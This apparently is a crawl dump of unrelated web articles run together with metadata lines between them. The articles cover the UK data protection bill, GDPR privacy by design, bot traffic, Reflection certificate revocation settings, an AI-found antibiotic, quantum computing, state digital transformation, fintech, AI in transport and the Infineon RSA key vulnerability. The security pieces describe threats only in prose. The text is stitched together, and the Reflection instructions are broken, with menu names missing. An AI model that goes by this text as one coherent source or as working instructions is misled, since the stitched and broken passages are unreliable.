The introduction of the Data Protection and Digital Information (No. 2) Bill to the UK Parliament on 8 March 2023 was the newest milestone in the UK’s data protection journey. This forward-looking initiative by the UK government aims to “update and simplify” the nation’s data protection laws and related legislation. With its second reading scheduled for 17 April, this transformative bill is anticipated to navigate through Parliament.
Change, while inevitable, can pose challenges to compliance. For organizations that have aligned their privacy programs with the UK GDPR, it’s crucial to stay attuned to the unfolding developments. The Centraleyes Risk and Compliance Platform offers a proactive and informed approach to risk management and compliance.
Stay connected, stay informed, and let Centraleyes be your strategic partner in the dynamic realm of data protection. | <urn:uuid:6042c844-4fc2-496f-ae40-38ae70263b8f> | CC-MAIN-2024-38 | https://www.centraleyes.com/privacy-laws/uk/ | 2024-09-12T03:39:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00428.warc.gz | en | 0.904089 | 2,592 | 3.140625 | 3 |
Privacy by design is an approach to systems engineering initially developed and formalized by a joint team led by the Information and Privacy Commissioner of Ontario (Canada), back in 1995. After a quarter of a century and an ever-growing swamp of personal data leakages, due to both the poor systems design and operations practices, as well as faulty data management habits, what is the purpose of still discussing this concept?
What does Article 25 of GDPR state about privacy by design & default?
The European Union General Data Protection Regulation (GDPR) brings a new perspective: Article 25 is conveniently named “Data protection by design and by default”. Before tackling the deviation from the original concept in wording, here is the breakdown from the Article 25 text:
- What does “Data protection by design and by default” include? Technical and organisational measures, designed to implement data-protection principles, such as pseudonymisation and data minimisation.
- What does it ensure? Meeting the requirements of the GDPR and protecting the rights of data subjects.
- What is the outcome of implementation? By default, only personal data which are necessary for each specific purpose of the processing are processed. Also, data should not be made accessible to a large number of persons without the intervention of the data owner/custodian (which relates to the “deny-first” principle, enabling access to data for only a limited number of authorised persons).
- Who is responsible? Data controllers and processors (as implied by Article 28). To help you determine their roles and how to establish good relationships with them, check out this article: The obligations of controllers towards Data Protection Authorities according to GDPR.
- How and when is it supposed to be applied? Both at the time of the determination of the means for processing and at the time of the processing itself – which translates to the design phase of the development of new systems and business practices, as well as assuring privacy assurance of existing personal data repositories.
- Ok, but what does it actually impose on the data controllers? The obligation applies to the amount of personal data collected, the extent of its processing, the period of its storage and its accessibility.
- Which factors influence the implementation? The actual implementation decision should be taking into account the technological environment, the cost of implementation, and the nature, scope, context and purposes of processing. Also, the selection of the process or tool of choice should be based upon the risk assessment results, taking into account the severity of the risk to the rights and freedoms of data subjects – the latter translates to the necessity of using Data Protection Impact Assessments (DPIAs), while the former leaves the final decision to the Data Controller, without stipulating any specific obligations. To find out more about the DPIA, check out this free webinar: Seven steps of Data Protection Impact Assessment (DPIA) according to EU GDPR.
Hopefully, this breakdown illustrates the vagueness of the principle, as outlined in the GDPR – there is no regulation-imposed measure, rather a set of suggestions, mentioning data minimisation and pseudonymisation.
The “privacy by design” approach vs. the GDPR’s “Data protection by design & default” concept
The reader is faced with two terms, both including the same phrase (“by design”), but each appearing in a different day and age. What follows is first the explanation of differences, followed by the summarisation of principles valid for both concepts.
The “original” privacy by design approach is not about data protection; rather, it focused on designing the system in such a way that data doesn’t need protection. The key concept here is anonymisation: a system designed as “fully” privacy compliant simply wouldn’t include disclosure of personally identifiable data to the data controller, while at the same time enabling certain system functionality. An example could be drawn from the Global Positioning System (GPS) device in the context of fleet management solutions – a vehicle’s GPS device enables detection of geographical location, without revealing the driver’s identity.
Somewhat contrary to that, with “Data protection by design & default”, the GDPR adopts the view that processing of personal data is inevitable; therefore, integration of “the necessary safeguards into the processing” is obligatory. It also brings a widening of scope, making it more of a multi-faceted concept. Along with the design of information technologies and systems, it also involves various organisational components, which implement privacy and data protection principles in systems and services.
Seven core principles of privacy by design
Now, let’s focus on the similarities. The “by design” principle in both approaches expresses the need for embedding privacy concerns in the design and operation of systems for personal data processing, business practices and physical design.
The approach specifies seven core principles:
- Being proactive rather than reactive – by anticipating and preventing privacy-invasive events beforehand, the aim is to prevent privacy risks from materialising.
- Privacy as the default setting – by ensuring that personal data is automatically protected in any given IT system or business practice, data subjects’ personal information is protected from the beginning of the lifecycle, and remains protected, without action required on their part.
- Privacy embedded into design – by integrating privacy into the system (without reducing functionality), it is recognised as the core component, rather than being thrown in later as an add-on.
- Full functionality – privacy should not be incorporated at the expense of, or as a trade-off for, functionality, security and performance.
- End-to-end security (providing full life-cycle management of data) – this involves ensuring that all personal data is securely collected, stored, processed, shared/disclosed and then securely destroyed at the end of the process.
- Visibility and transparency of data – this refers to forcing transparency of the processing practices in accordance with the stated promises and objectives, making them visible to the data subjects and processors and subject to independent verification (audit).
- Respect for user privacy (user-centric) – this requires architects and operators to protect the interests of the data subject by offering such measures as strong privacy defaults, appropriate notice, and empowering, user-friendly options.
Principles in theory vs. practice
All these principles sound excellent (as principles often do). And, while some efforts to put the theory into practice are relatively straightforward and quickly winnable (e.g., developing and publishing privacy policies and notices, introducing privacy awareness programs, assessing data retention obligations, locking file cabinets with employee records), those falling into the technology realm require a more exhaustive approach.
However, serious discussions about privacy principles themselves require a change of mindset in the organisation’s environment. This helps to establish an ongoing effort of raising the level of privacy assurance. And, the best way to raise this GDPR-weighted lever is by starting from the top, all the way down to the very machine running a business – the people and production systems.
Click here to read the full text of the GDPR to find out more about the privacy by design approach. | <urn:uuid:30a69a2e-a9eb-41ed-ba02-5665fc2cf8b4> | CC-MAIN-2024-38 | https://advisera.com/articles/what-is-privacy-by-design-and-default-according-to-gdpr/ | 2024-09-15T20:02:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00128.warc.gz | en | 0.925852 | 1,486 | 2.953125 | 3 |
Any non-human traffic on a website or an app is called bot traffic. Bots are a common occurrence on the internet and constitute nearly two-thirds¹ of the total internet traffic.
Bot traffic is generally considered dangerous. However, depending on their use, bots can also be beneficial, such as in services like digital assistants and search engines.
On the other hand, bad bots can be used to steal information and launch several types of attacks that can jeopardize business operations and adversely impact revenue and user experience. This is why it is essential for digital businesses to effectively manage bots visiting their digital platforms.
Should businesses block bot traffic?
Although good bots can improve visibility of businesses through search engines, bad bot traffic can cause immense harm by disrupting performance of the website, impacting security, and causing customer dissatisfaction. Bots are increasingly powering complex attacks including credential stuffing, account takeover, fake account generation, price scraping, and more. Therefore, businesses must be able to distinguish between useful and malicious bot traffic to take effective countermeasures to protect against bad bot traffic.
How does bot traffic affect business?
Malicious bots continue to pose a growing challenge for digital businesses. Not only are bots used to steal consumer and business information, huge amounts of bot traffic are also used to overwhelm digital platforms to slow down the page load speed, affecting visitor experience.
- Attacks: Large amounts of bot traffic can be used to launch distributed denial of service (DDoS) attacks, making websites unavailable to genuine customers. The delay in access to the platform, especially in the ecommerce and travel industries, can force customers to switch over to competitors, causing revenue losses to the affected businesses.
- Disruption: Bot traffic is also used to disrupt social media platforms by artificially inflating the number of followers or liking a post, influencing public opinion, tarnishing the image of public figures, and spreading disinformation that can lead to disharmony and conflicts.
- Performance: When bot traffic is used to attack pay-per-click ads, the advertising industry can suffer a setback in the form of distorted SEO results and skewed data analysis. This is because bot traffic can trigger fake ad clicks (click fraud), which affect the pay-per-click ads. Further, website performance is obliterated due to the deviations caused in the data, such as page views, time spent, bounce rate, user location, and so forth.
- Traffic: Unusually high bot traffic is often used to hoard inventories. Bots add enormous amounts of merchandise to the carts, which are not purchased, but only with the intention of preventing genuine customers from accessing them. Inventory hoarding obstructs efforts to improve conversion rates. On the contrary it increases cart abandonment rates. Often, bot traffic is used to scrape data, including personal information of consumers such as phone numbers and email IDs as well as sensitive business data, which is then used to facilitate phishing attacks.
- Data Loss: Data is also extracted by using bot traffic to infect devices with malware and taking control of the infected devices. These infected devices can be connected to form a botnet to launch more complex attacks at scale. Large volumes of bot traffic can hinder fraud prevention efforts by causing unnecessary noise.
Telltales of bot traffic
Detecting bots is crucial to maintaining overall security of the digital platform. However, security teams must ensure that bot detection does not lead to false positives or false negatives. There are certain telltales that can help security teams identify bot traffic. Some of these include:
- Pageviews: An abnormal spike in pageviews could likely be a handiwork of bots.
- Bounce rate: A high bounce rate could indicate heightened bot traffic to the website.
- Session duration: Increase or decrease in session durations – the time users spend on a website – should indicate bot activity as they may browse the websites much slower or faster, respectively than the humans.
- Conversions: Surge in form submissions, account creation, or conversions using fake user details can be due to bot traffic.
- Location-specific traffic: A spike in traffic from a specific geographical location, especially not the target customer base of the business could indicate bot traffic.
- IP-specific traffic: An increase in user requests from a single IP within a short duration could be bot traffic.
How can businesses manage bot traffic?
Since bot traffic has the potential to disrupt operational efficiency of digital platforms and expose them to heightened risks, it is imperative that businesses deploy appropriate countermeasures to stop bots from negatively impacting their business and user experience.
To identify bot traffic and preventing it from causing harm to their digital platforms, businesses can consider using the following:
- Robots.txt file: This file can be included to provide instructions for bots crawling the page. It can also be used to completely prevent bots from interacting with the website.
- CDN: A Content Delivery Network (CDN) is a distributed platform of servers that can help reduce delay in loading web pages. It also alleviates the risk of a sudden surge in bot traffic to help optimize the website performance.
- Add HTTPS: Adding HTTPS to the website creates an encrypted channel between the website and its users, providing better security to the information traversing between the server and the browser.
- Tools: Deploy tools such as rate limiting solutions, DDoS mitigation, Web Application Firewalls (WAF), and access control lists (ACL).
- Bot management solutions: Add a layer of security to detect and prevent bot traffic, especially intelligent bots that can mimic human behavior.
Hallmarks of a good bot detection solution
Considering the advancements in bot technology and human-like capabilities that bots have acquired, an effective bot detection solution should be able to block bots of all sophistication levels in real-time. That said, bot management solutions should integrate easily with other tools and existing security infrastructure of the organization to prevent undue addition to technical debt.
Why work with Arkose Labs for bot traffic management?
Malicious bot traffic can be a grave risk for digital platforms and cause financial and reputational losses. Rooting out bad bot traffic using an efficient bot management solution, such as Arkose Labs, should be a priority for digital businesses.
Global brands trust Arkose Labs for effective bot traffic management. Arkose Labs’ bot management solution accurately identifies bot traffic from humans and uses proprietary enforcement challenges to block them. Even the most intelligent and human-like bots cannot clear these challenges at scale because they are trained against the latest computer vision technologies, making them resilient to advanced capabilities of bots.
Using embedded machine learning, historical attack pattern calibration, and anomaly detection, Arkose Labs segments incoming according to the risk assessment. Further, using a ‘clear box’ approach to deliver actionable insights, Arkose Labs provides security teams with clear explanations for risk classifications and flexibility to segment traffic for remediation – through proprietary challenge-response technology. This combination of transparency and dynamic attack response allows security teams to efficiently manage bot traffic on their digital platforms. | <urn:uuid:3563796b-e1bb-4f15-80f3-d257bf02fc75> | CC-MAIN-2024-38 | https://www.arkoselabs.com/anti-bot/bot-traffic | 2024-09-17T02:10:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00028.warc.gz | en | 0.91924 | 1,423 | 2.890625 | 3 |
Reflection SSL/TLS and Secure Shell connections can be configured to authenticate hosts using digital certificates An integral part of a PKI (Public Key Infrastructure). Digital certificates (also called X.509 certificates) are issued by a certificate authority (CA), which ensures the validity of the information in the certificate. Each certificate contains identifying information about the certificate owner, a copy of the certificate owner's public key (used for encrypting and decrypting messages and digital signatures), and a digital signature (generated by the CA based on the certificate contents). The digital signature is used by a recipient to verify that the certificate has not been tampered with and can be trusted. . To ensure that certificates have not been revoked, you can configure Reflection to check for certificate revocation using CRLs A digitally signed list of certificates that have been revoked by the Certification Authority. Certificates identified in a CRL are no longer valid. or using an OCSP A protocol (using the HTTP transport) that can be used as an alternative to CRL checking to confirm whether a certificate is valid. An OCSP responder responds to certificate status requests with one of three digitally signed responses: "good", "revoked", and "unknown". Using OCSP removes the need for servers and/or clients to retrieve and sort through large CRLs. responder.
When CRL checking is enabled, Reflection always checks for CRLs in any location specified in the CRL Distribution Point (CDP) field of the certificate. In addition, Reflection can also be configured to check for CRLs located in an LDAP A standard protocol that can be used to store information in a central location and distribute that information to users. directory or using an OCSP A protocol (using the HTTP transport) that can be used as an alternative to CRL checking to confirm whether a certificate is valid. An OCSP responder responds to certificate status requests with one of three digitally signed responses: "good", "revoked", and "unknown". Using OCSP removes the need for servers and/or clients to retrieve and sort through large CRLs. responder.
Reflection's default value for certificate revocation checking is based on your current system setting. If your system is configured to do CRL checking, all Reflection sessions will check for certificate revocation using CRLs by default.
NOTE:When Reflection is running in DOD PKI mode, certificate revocation is always enabled and cannot be disabled.
To enable CRL checking for all SSH sessions
In Internet Explorer, choose
> > .Under
, select .Using Reflection, you can enable certificate revocation checking using either a CRL or an OCSP responder.
To enable CRL checking for a Secure Shell session (FTP Client and SSH terminal sessions)
dialog box.Click the
or .To enable CRL checking for SSL/TLS sessions (FTP Client only)
dialog box.On the
tab, click Configure PKI. ( must be selected.)Select either | <urn:uuid:c85b19af-4f19-45dc-8507-21acfdd53ba8> | CC-MAIN-2024-38 | https://www.microfocus.com/documentation/rsit-windows-client/8-2-1/user-guide/en/t_1427.htm | 2024-09-17T01:13:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00028.warc.gz | en | 0.841604 | 620 | 2.65625 | 3 |
Scientists have used artificial intelligence (AI) to discover a new antibiotic, abaucin, that has been reported to show useful activity and kill off deadly superbugs. New evidence suggests that abaucin is effective against Acinetobacter baumannii (A. baumannii), which the World Health Organisation has identified as a “critical” threat to humanity.
As reported by BBC news, the AI helped narrow down thousands of potential chemicals to just a handful that could be tested in the laboratory. The result of which proved that an experimental antibiotic could prove to be very effective, but it will need to undergo further testing before it can be used.
AI trained to analyse nearly 7000 compounds
Acinetobacter baumannii is a so-called ‘superbug’ that can cause infections in the blood, urinary tract, and lungs (pneumonia), or in wounds in other parts of the body. According to the CDC, it can also “colonise” or live in a patient without causing infections or symptoms, especially in respiratory secretions or open wounds. These types of infections typically occur in people in healthcare settings, ultimately impacting already unwell or immunocompromised patients.
Researchers used an AI algorithm to screen thousands of antibacterial molecules in the hopes of predicting new structures. As a result of the screening, researchers were able to identify a new antibacterial compound: abaucin.
This was after the AI model was used to analyse 6,680 compounds that it had not encountered before. The process took an hour and a half and the result was that 240 compounds could be tested in the laboratory, ultimately revealing nine potential antibiotics - one of which being abaucin.
“We had a whole bunch of data that was just telling us about which chemicals were able to kill a bunch of bacteria and which ones weren’t. My job was to train this model, and all that this model was going to be doing is telling us essentially if new molecules will have antibacterial properties or not,” said Gary Liu, a graduate student from MacMaster University who worked on the research, as reported by The Guardian.
Sparking the medical revolution?
Laboratory experiments involved testing abaucin on mice with open wounds, which confirmed that it was not only able to suppress the infection, but kill A. baumannii samples in patients completely. Researchers believe that the precision of abaucin will ultimately work to combat drug resistance.
The researchers in Canada and the US have said that AI has the power to massively accelerate the discovery of new drugs. Professor James Collins, from the Massachusetts Institute of Technology (MIT), said to the BBC: "This finding further supports the premise that AI can significantly accelerate and expand our search for novel antibiotics.”
Also working in the laboratory is Dr Jonathan Stokes, from McMaster University, who expects that the first AI antibiotics could take until 2030 until they are available to be prescribed. He added: "AI enhances the rate, and in a perfect world decreases the cost, with which we can discover these new classes of antibiotic that we desperately need."
This discovery comes in the wake of AI being used more extensively within the healthcare industry. As reported in April 2023, Google DeepMind in particular has achieved many scientific breakthroughs with its AI, AlphaFold, being able to predict protein structures | <urn:uuid:422a839f-c5c5-4b70-bc48-b617f0156e93> | CC-MAIN-2024-38 | https://aimagazine.com/articles/scientists-use-ai-to-discover-superbug-killing-antibiotic | 2024-09-19T11:02:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00728.warc.gz | en | 0.969981 | 692 | 3.328125 | 3 |
(FedTechMagazine) Many IT decision-makers seem unsure about the basics of quantum technology, and it’s unclear how this new approach might be implemented in federal agencies.
Thyagarajan Nandagopal, acting deputy assistant director of the Computer and Information Science and Engineering directorate at the National Science Foundation, points to quantum’s special strength in building and breaking encryption algorithms. This could impact security across government, and it might have special implications for the military.
If quantum helps us see deeper into biological processes, the Agriculture Department could use it to tweak photosynthesis and perhaps grow food more efficiently.
It might just make daily government processes more efficient. “A data set that takes days or months to churn through could give us answers in just a couple of seconds,” Nandagopal says. “That means you can make a sound policy decision based on that data much more quickly.”
In the near term, government’s biggest role may be in helping to further the evolution of this emerging technology. Government labs and government-funded universities play an important role in fundamental research and the education of future quantum computing scientists and engineers. | <urn:uuid:31a26f6a-2ec1-474a-9013-b65739a4c66e> | CC-MAIN-2024-38 | https://www.insidequantumtechnology.com/news-archive/how-federal-agencies-may-implement-quantum-computing/amp/ | 2024-09-20T16:17:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00628.warc.gz | en | 0.934527 | 241 | 2.828125 | 3 |
At its core, digital transformation is the process of integrating forward-thinking technology into all areas of an organization — something that brings with it a host of unique benefits.
For starters, digital transformation is an excellent way to improve efficiency. It allows employees to leverage modern technology to work smarter, not harder, thus saving time, money, and resources in the process. It’s also an ideal way to increase transparency. Organizational leaders can better understand the current processes of their employees and where certain inefficiencies may exist, allowing them to do something about them as quickly as possible.
While it’s true that much of the discussion of digital transformation is usually centered around private businesses, it’s a process that can truly benefit an organization like a state government, too. It’s arguably more important within this context as it directly impacts the hardworking people who live and work in a particular community.
Why Digital Transformation Matters
One of the reasons why it’s so critical for state agencies to take a proactive approach to digital transformation has to do with just how quickly the technology landscape is changing in the first place.
It’s long been an issue that technology and related services are evolving so rapidly that it’s difficult to draft and implement laws designed to protect consumers. Issues surrounding data privacy are commonplace.
In January of 2020, for example, California instituted the CCPA or “California Consumer Privacy Act” in an attempt to better define what is legal and what isn’t in terms of data privacy. Unfortunately, this legislation quickly proved to be confusing at best and inadequate at worst.
Facial recognition technology is another great example. On your average smartphone, the technology can be used to authenticate someone’s identity to give them access to the device and to prevent others from doing the same. But in the context of a state government, it brings with it issues of how it might be used in terms of surveillance by local law enforcement.
A digital transformation project not only helps agencies serve their constituents but can also help them ensure they’re not lagging.
Digital transformation for state agencies should always be constructed based on the actual needs and preferences of the people who live in their jurisdiction. Technologies like facial recognition in public services cannot be instituted simply for the sake of it, or it simply creates a situation where many of the issues like those outlined above become a foregone conclusion.
Another reason why it’s so dangerous for state agencies to use lagging technology has to do with a negative ripple effect. In the short term, it creates bureaucratic bottlenecks almost everywhere. The people who need access to certain services to better live their lives don’t have it, creating a poor experience for all involved.
But in a larger sense, it also creates needless inefficiencies for the organizations that are regulated by state agencies. In a lot of areas, certain types of businesses have to report information to state agencies as a part of their daily operations. If one such agency is up-to-date with modern platforms and another is still using technology from a decade ago, it creates a lack of consistency that gives way to human error. Those businesses now have to spend time inputting the same information in entirely different formats, which only raises their costs and wastes their time, as well.
Not only that but there are also local governments out there that still require businesses to report data by way of paper reports. Not only does this further delay that data getting into the hands of the people who need it most, but it opens the door to a plethora of other issues.
As opposed to a file on a secure server, a paper form is often difficult to find and easy to lose. People spend so much time in a day looking for information that they have less time to act on it, which poses significant problems.
In the end, digital transformation for state agencies is no longer a recommendation; it’s officially a requirement. Even the communication and collaboration benefits alone would make the effort more than worth it, to say nothing of how it can help meaningfully improve the lives of citizens in our communities. Contact us to begin your journey to efficiency by utilizing digital transformation. | <urn:uuid:1884cef7-a780-4eed-9e2c-36be3bdaa42e> | CC-MAIN-2024-38 | https://dminc.com/blog/dangers-of-lagging-tech-in-state-agencies/ | 2024-09-07T11:17:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00092.warc.gz | en | 0.952758 | 860 | 2.59375 | 3 |
The field of finance is rapidly changing , financial firms, insurance agencies and investment banks are involved at the intersection of data and technology. Big data, machine learning, harnessing algorithms, blockchain technologies are widely spreading to conduct businesses.
Financial technology or Fintech referred to back-end technology used to function traditional financial services however in today’s scenario the term has broadened to incorporate new innovations in technology in finance sector such as crypto currencies, block chain, robo-advising, crowd funding etc.
In this article we will learn more about Fintech technology, its history, span in current times, its functions, advantages and use cases etc.
Adoption of Fintech
Technology played a key role in every sector including the financial sector. It has come a long way and changed but what was the starting point when we adopted financial infrastructure?
Year 1887 – 1950 was an era when we started using technologies such as telegraph, railroads and steamships which allowed for the first-time rapid transmission of financial information across borders.
Year 1950s bought credit cards, 1960 bought us ATMs and 1970s bought us electronic stock trading, in 1980s bank mainframe computers and more sophisticated data record keeping systems, 1990s bought internet and e-commerce business
In the 21st century we are using mobile phones, wallets, payment applications, equity crowd funding, robo advisors, crypto currency and many other financial technologies which have changed the face of banking services.
In today’s digital era the traditional services once provided by financial institutions have lost their relevance and no longer meet the demands of tech savvy customers. Consumers have become used to digital experience and ease of functions as provided to them by global giants like Apple, Microsoft, Facebook etc. where by a simple click or swipe on smartphone can make tasks easier for end customers. As per the 2019 Global Fintech report the industry raised $24.6 billion with funding topping to $8.9 billion in the 3rd quarter of the financial year.
FinTech refers to technology and innovation which aims to compete with financial services to create new and better service experiences for consumers of banking, asset management, wealth management, investments, insurance and mortgage sectors. With the financial industry some of the technologies used include artificial intelligence, big data, robotic process automation (RPA), and blockchain. Artificial intelligence is used in various forms , AI algorithms are used to predict changes in the stock market and provide insight into the economy. Customer spending habits can be charted. Chat bots are used to help customers with their services.
Artificial intelligence works best with the combination of big data and management solutions. AI analyses the performance of financial institutions, creates insights and automates essential organization processes such as documentation, client communication etc. Machine learning (ML) is key component of AI and widely used in many areas of banking sector such as:
- Fraud prevention – ML tools analyse existing fraudulent cases, detect common patterns, and evaluate and predict possible frauds and uncover discrepancies
- Risk management software analyses organization performance and detect potential threat patterns
- Fund development prediction is performed by scanning investment records, an ML powered tool can define most probable future developments
- Customer service enhancement by analysing customer data and build a smart consumer profile
Pros and Cons of FinTech
- Increase in accessibility and approachability to large section of people
- Speed up the rate of approval of finance or insurance.
- Greater convenience to its customers by enablement of services over mobile devices, tablets or laptops from anywhere
- Low operating costs as companies are not required to invest in physical infrastructure such as branch network
- Investments in major security to keep customer data safe and secure using technologies like biometrics and encryption
- Limited access to soft information
- Different standards, procedures including business activities which are different then traditional banks. Have to pay higher charges imposed by OCC.
Benefits of FinTech
- Speed and convenience with FinTech products as products and services are delivered online in easier and quick manner
- Great choice of products and services as they can be bought remotely irrespective of location
- More personalized products by collecting and storing more and more information about customers so as to able to offer consumers more personalized products and services as per their requirements or buying pattern | <urn:uuid:54344a65-43c9-478c-872a-fd9e7074b725> | CC-MAIN-2024-38 | https://networkinterview.com/what-is-fintech-technology/ | 2024-09-07T11:56:30Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00092.warc.gz | en | 0.944082 | 867 | 2.890625 | 3 |
Ready to learn Machine Learning? Browse courses like Uncertain Knowledge and Reasoning in Artificial Intelligence developed by industry thought leaders and Experfy in Harvard Innovation Lab.
Artificial intelligence has been a far-off dream for decades—but recent advances in AI have shown that we could soon be using it to solve some of society’s biggest problems. Almost two years ago, in January of 2016, AI beat the world’s best player of the game GO, which is incredibly complex and has more potential moves than we have atoms in the universe. This shows that computers are now able to surpass human capabilities in some complex tasks, even if that task is a game. AI has gotten better at voice and face recognition, and error rates are getting lower and lower, signaling the start of widespread AI use.
While playing games and tagging Facebook photos are interesting and promising AI accomplishments, more practical applications of AI are on the horizon. Those applications will include helping the transportation industry to solve some of our biggest challenges in getting from place to place. Here are 4 important ways AI will help improve our transportation system.
1. Urban Design
Urbanization has been growing in the last few decades, and has caused skyrocketing housing prices, pollution, and increased congestion on roadways. 50% of the global population already lives in cities, and that percentage is expected to increase to 70% over the next 40 years. Public transportation is an essential service in urban areas, as pollution and traffic from growing numbers of personal vehicles becomes an even greater issues. AI can help offset these realities of urbanization by optimizing essential urban design.
Easing congestion in cities involves massive amounts of data, collected by sensors and cameras. AI can assist with urban design and traffic control in several ways, including adjusting variable speed zones based on traffic, traffic light timing, and smart pricing for vehicle tolls.
2. Car Communication
Key to the future of autonomous vehicles is car communication. Avoiding collision is, of course, a top priority for self-driving car developers, and these efforts have been largely successful. However, mini communications take place between drivers, cyclists, and pedestrians all the time—we often don’t even register how often we make eye contact with others on the road. So how can an automated vehicle safely navigate the many hazards of the road? AI advancements are making it possible.
Drive.ai is the most prominent company using deep learning to solve these communication obstacles facing self-driving cars, and see these vehicles as “social robots”. This AI advancement, and ability to pick up the nuances of human cues will be essential during the inevitable transition period: some cars on the road will be autonomous, and some will not. The AI needs to be able to not only navigate cues on the road, but provide them to drivers, ensuring safety for everyone. Drive.ai isn’t building autonomous vehicles; they’re outfitting existing vehicles with the sensors and other hardware they need to become autonomous, making it easier than ever to improve car communication.
We’ve been quickly refining manufacturing techniques and technology since the first Industrial Revolution, and AI will be key in the next evolution of manufacturing. 3D printing and AI will mean that creating better forms of transportation will be more efficient and more dynamic. Automation and real-time feedback from vehicles on the road will help manufacturers optimize their products quickly. Instead of waiting for vehicles (both personal and commercial) to be shipped from overseas, they will be able to be manufactured locally, cutting down on wait times and resulting in better manufacturing without human intervention.
4. Optimization Through Machine Learning
In a nutshell, machine learning describes the ability of machines to learn without being given directives via programming. Machine learning is essential for future transportation systems, since self-driving cars need to be able to adapt to their environment, and will almost certainly not have programming to deal with every single situation the vehicle could encounter on the road. As more autonomous vehicles get on the road, they will use the information they gain through everyday driving situations to optimize themselves. AI is getting smarter thanks to innovative programmers—but it’s also making our transportation system better by building on the building blocks these programmers provided. | <urn:uuid:ca7cb887-1604-424b-b3b8-fb03e6528418> | CC-MAIN-2024-38 | https://resources.experfy.com/ai-ml/4-ways-ai-will-improve-our-transportation-system/ | 2024-09-08T12:16:35Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00892.warc.gz | en | 0.955734 | 857 | 3.234375 | 3 |
Infineon’s RSA Vulnerability Reveals Seismic Fault Line in Cybersecurity
Recently, researchers at Masaryk University made a startling discovery when they uncovered a serious vulnerability in the cryptographic library used in security chips manufactured by Infineon since 2012.
These chips—used in TPMs, smart cards and other environments—are so common as to be practically ubiquitous. Potential consequences are just as far-reaching, placing people at greater risk of identity theft, decryption of confidential data, injection of malicious code into digital signed software, and bypassed protections that prevent accessing or tampering with stolen PC.
The vulnerability is especially problematic as it is located in code that complies with two security certification standards, NIST FIPS 140-2 and CC EAL5+, which are pervasive throughout the networks of many governments, contractors, and companies around the world. The paper, scheduled for publication in early November, is not yet available in its entirety, but its title reveals that the RSA key generation of these chips is particularly vulnerable to a form of Coppersmith’s attack.
More specific details about the potential for attack will be presented at the ACM Conference on Computer and Communications Security (CCS) on October 30, but the flaw has already having significant impact on many applications and systems.
The Vulnerability Found In Infineon's Chips Has Already Had A Widespread Effect
On August 30, researchers alerted officials in Estonia that 750,000 government identify cards, issued since October 2014, might be compromised. These cards—used for online authentication, digital contracts, business, access to government services and more—are more common and more significant than driver’s licenses. The vulnerability makes identity theft possible without the need to have physical access to the card itself, since only the public key is required. As a result, Estonian officials have announced that they would shut down the public key database.
Also impacted are Trusted Platform Modules that have become standard to ensure system integrity and protection. A TPM is the standard cryptographic chip built into computers to store sensitive information like encryption keys. Storing this information on a chip is usually significantly safer than relying on software, which is easier to compromise. (Though it is important to note that not all vendors use chips from Infineon.)
In an interview with arsTechnica, the researchers revealed that they examined a sampling of 41 different laptop models that use TPMs. About 25 percent used Infineon's vulnerable chip. The vulnerability is especially critical for TPM version 1.2, because Microsoft's BitLocker is affected —greatly increasing the potential for hackers and threat actors to access protected, confidential data on stolen or lost laptops. Beside BitLocker, TPMs are critical for other security features in Microsoft’s Windows and administrators are urged to take mitigation actions.
Since RSA has become a critical part of the foundation of internet security, these examples could prove to be the very tip of the iceberg.
In the same interview, the researchers further mentioned that they scanned the Internet for fingerprinted keys and quickly found hits in a variety of interesting places. They discovered vulnerable keys in certificates used for Transport Layer Security. (Interestingly, many contain the string “SCADA” in the common name field.)
This raises the possibility that vulnerable keys are used in SCADA systems which usually control the industrial equipment that is used in critical infrastructure. The Department of Homeland Security identifies 16 different critical infrastructure sectors—including chemical, communications, energy, financial services, food and agriculture, water systems and nuclear reactors.
The researchers went on to test PGP keys used for email encryption. Out of nearly 2900 tested, more than 950 were affected—the majority generated by the Yubikey 4, a product by Yubico which is using the vulnerable chip. Furthermore, they found 447 fingerprinted keys on the internet used to sign GitHub submissions. More than half (237) showed the vulnerability. GitHub has since been notified of the fingerprinted keys and is in the process of getting users to change them.
As disconcerting as these findings alone may be, they represent merely a sample of vulnerable keys. It is estimated that there are a significantly more out there.
So how likely is an attack?
That depends on a range of factors. One has to look at the individual use case to have clarity about the effects. What makes this vulnerability so severe, though, is the fact that an attacker only needs the public key and does not require access to the hardware. Once an attacker has access to the public key, the expense and effort required to get the private key depends on the actual key size. However, to spare time and cost, attackers can first test a public key to see if it is vulnerable to the attack. This test is inexpensive and requires less than 1 millisecond. This allows attackers to focus their effort only on keys which are actually factorable.
As dire and alarming as these findings are, they could reveal a benefit in the form of a wake-up call that is long overdue. While the findings are breaking news, the vulnerability has been around for years. In a world where digital transcends all borders, we are all impacted by these vulnerabilities.
For many individuals and organizations alike, cryptography is the most significant source of security that they have never heard of before now. As our lives, both personal and professional, have become intrinsically intertwined with digital and online activity, cryptography has become a critical, though invisible and often unconsidered, part of securing our daily lives and activity.
Though the imperative is clear, for many, the next steps may seem daunting. They shouldn’t. Though cryptographic algorithms are deeply embedded and widely deployed across systems, there are ways to identify them. Mitigating significant damage begins with finding out who and what systems are at risk. Once the vulnerable systems are identified, it is then possible to replace them with secure ones.
Make no mistake though: The time to identify those at risk is now. There is a reason why the researchers informed Infineon and others months ago. Addressing these challenges takes time and until they are, many systems are vulnerable.
